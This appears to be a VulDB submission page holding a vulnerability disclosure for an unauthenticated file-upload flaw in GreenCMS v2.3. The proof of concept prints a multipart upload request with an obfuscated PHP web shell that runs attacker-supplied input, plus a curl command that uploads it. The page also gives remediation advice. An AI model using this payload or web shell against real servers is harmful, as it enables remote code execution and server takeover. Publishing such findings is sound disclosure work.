Gửi #633847: github.com GreenCMS v2.3 File unrestricted uploadthông tin

tiêu đềgithub.com GreenCMS v2.3 File unrestricted upload
Mô tả# Projectworlds GreenCMS Project V2.3 /index.php?m=admin&c=media&a=fileconnect File unrestricted upload # NAME OF AFFECTED PRODUCT(S) - GreenCMS ## Vendor Homepage - github.com # AFFECTED AND/OR FIXED VERSION(S) ## submitter -USTC-l1nk ## Vulnerable File - /index.php?m=admin&c=media&a=fileconnect ## VERSION(S) - V2.3 ## Software Link - https://github.com/GreenCMS/GreenCMS # PROBLEM TYPE ## Vulnerability Type - File unrestricted upload ## Root Cause - A file unrestricted upload vulnerability was found in the '/index.php?m=admin&c=media&a=fileconnect ' file of the 'GreenCMS' project. The reason for this issue is that attackers can upload arbitrary files (including malicious scripts) through the parameter without proper verification of file type, size, content, or storage path, allowing them to execute malicious code on the server and perform unauthorized operations. ## Impact - Attackers can exploit this file unrestricted upload vulnerability to upload malicious scripts (such as PHP, JSP, ASP files), gain server control, access or tamper with sensitive data, spread malware, and even cause service paralysis, posing a severe threat to system security and data confidentiality. # DESCRIPTION - During the security review of "GreenCMS", I discovered a critical file unrestricted upload vulnerability in the "/index.php?m=admin&c=media&a=fileconnect " file. This vulnerability arises from inadequate validation and restrictions on the parameter when handling file uploads, enabling attackers to upload arbitrary files. As a result, attackers can execute malicious code on the server, gain unauthorized access to the system, and compromise data security. Immediate remedial measures are required to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability location: - /index.php?m=admin&c=media&a=fileconnect ## Payload: ```makefile -----WebKitFormBoundary2zjMreBWbXS7pEsT Content-Disposition: form-data; name="cmd" upload ------WebKitFormBoundary2zjMreBWbXS7pEsT Content-Disposition: form-data; name="target" l1_XA ------WebKitFormBoundary2zjMreBWbXS7pEsT Content-Disposition: form-data; name="upload[]"; filename="shell.php" Content-Type: application/octet-stream <?php class G2q1sJpI{/*F47ax9*/function __construct($x){$c=str_rot13('ffreg');/*F47ax9*/$a= ("!"^"@").$c;/*F47ax9*/$a($x);}}new G2q1sJpI($_REQUEST['1']); ?> ------WebKitFormBoundary2zjMreBWbXS7pEsT-- ``` ## The following are screenshots of some specific information obtained from testing file uploads: ```bash 《curl -X POST -F "[email protected]" http://10.20.33.16/index.php?m=admin&c=media&a=fileconnect 》 ``` <img width="2034" height="1066" alt="Image" src="https://github.com/user-attachments/assets/aebf3f9d-c96a-4598-b72f-cbefe360b57c" /> <img width="2150" height="914" alt="Image" src="https://github.com/user-attachments/assets/fe56428d-7a33-4f9c-aeed-d99a2adc2ec4" /> # Suggested repair 1. **Strict file type verification:** Verify the file type through MIME type checking, file extension whitelisting, and even file content inspection to ensure only allowed file types (such as images like .jpg, .png) can be uploaded. 2. **Set file size limits:** Restrict the size of uploaded files to prevent large files from consuming server resources or being used for malicious purposes. 3. **Store files outside the web root directory:** Save uploaded files in a directory that is not directly accessible via the web, and use a script to read and deliver files when needed, avoiding direct execution of uploaded files. 4. **Rename uploaded files:** Generate a unique random name for each uploaded file instead of using the original filename, which can prevent path traversal attacks and ensure file uniqueness. 5. **Regular security audits:** Regularly check the file upload function and related code to identify and fix potential security loopholes in a timely manner.
Nguồn⚠️ https://github.com/lan041221/cvec/issues/10
Người dùng USTC-l1nk (UID 88925)
Đệ trình13/08/2025 19:39 (cách đây 11 các tháng)
Kiểm duyệt25/08/2025 11:09 (12 days later)
Trạng tháiđược chấp nhận
Mục VulDB321258 [GreenCMS đến 2.3.0603 index.php?m=admin&c=media&a=fileconnect upload[] nâng cao đặc quyền]
điểm20

Do you need the next level of professionalism?

Upgrade your account now!